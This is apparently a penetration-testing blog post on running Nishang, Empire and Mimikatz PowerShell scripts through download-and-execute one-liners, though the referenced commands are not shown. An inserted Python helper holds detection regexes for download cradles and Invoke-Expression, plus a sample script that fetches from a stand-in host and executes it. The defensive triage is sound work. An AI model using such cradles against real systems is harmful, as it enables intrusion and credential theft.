Day 76: Use Nishang/Empire and Other Ps1 Scripts ‘Manually’.

Find Interesting Scripts

First, we want to see what we actually have once Nishang, Empire and the other offensive PowerShell testing frameworks are installed. To do this, just try the following:

You should see something like this excerpt, taken from one of my lab VMs…

Some of those things sound awesome, right? Code execution, persistence, pivoting, exfil and much more; this is enough to get any offensive security tester wet around the lips. But what if we don’t want to use a full framework and just want to run a single command? Try this to download and run at the same time.

Example with Mimikatz

Mimikatz we know well, but others not so much. In those cases it’s important to see what a script actually does before running it, or it might get us noticed, kill our shell or, worse, BSOD the box. So we should be careful and check the code first.

You will generally see something like this…

The most important line is this…

Always check this: some people are not consistent with naming conventions and you might have to use your head. For those who don’t know, the function name is what you need to call to invoke the script’s functionality.

The rest of the script gives you usage information and further examples of running it.
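As an added example (not code from the original post, nor from Nishang or Empire), a small Python triage helper that does the "check the code first" step described above over a .ps1 body: it lists the functions the script defines (the names you would call) and flags primitives that deserve a second look before you run it, or when they show up in PowerShell script block logs. The script fragment below is constructed for this example and is not a real module.

```python
import re

# Constructed sample in the style of an offensive .ps1 module header and body.
# It is not a real Nishang/Empire file; it only exists to exercise the triage below.
SAMPLE_PS1 = r"""
<#
.SYNOPSIS
Module header in the usual style (constructed for this example).
#>
function Invoke-ExampleDump
{
    [CmdletBinding()] Param ([String]$Target)
    $bytes = (New-Object Net.WebClient).DownloadData('http://example.invalid/x')
    Invoke-Expression $Target
}
Function Get-ExampleInfo { 'info' }
"""

# PowerShell function definitions: "function Name" or "Function Name" at line start.
FUNCTION_RE = re.compile(r'^\s*function\s+([\w-]+)', re.IGNORECASE | re.MULTILINE)

# Primitives that commonly mean "fetch and run from memory"; worth reviewing in a
# script before running it and worth alerting on in Event ID 4104 script block logs.
INDICATORS = {
    "download_cradle": re.compile(r'DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b', re.I),
    "dynamic_exec":    re.compile(r'Invoke-Expression|\biex\b', re.I),
    "in_memory_load":  re.compile(r'\[Reflection\.Assembly\]::Load|Add-Type', re.I),
    "encoded_cmd":     re.compile(r'-enc(odedcommand)?\s', re.I),
}


def triage_ps1(text):
    """Return (entry-point function names in file order, sorted indicator tags)."""
    functions = FUNCTION_RE.findall(text)
    hits = sorted(tag for tag, rx in INDICATORS.items() if rx.search(text))
    return functions, hits


if __name__ == "__main__":
    names, flags = triage_ps1(SAMPLE_PS1)
    print("functions to call:", names)   # ['Invoke-ExampleDump', 'Get-ExampleInfo']
    print("review before running:", flags)  # ['download_cradle', 'dynamic_exec']
```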

For us, all we need to do to download this file and execute it is this one line…

Pentest Box

Windows Shell

In your Windows terminal you will see the output from the script; it really is that easy. Now spend some time looking at .ps1 scripts and seeing what you can do. PowerShell is dying in some of the more secure corporate environments, but for the rest, PowerShell is still a titan of pwnage, a gift that keeps on giving.

Of course, some scripts need elevated privileges, so I ran this in an admin prompt to show the one-liner in action. This can be delivered from anywhere: web shells, command injection, low-privilege shells, etc.

Security Researcher / 365 Days of PWN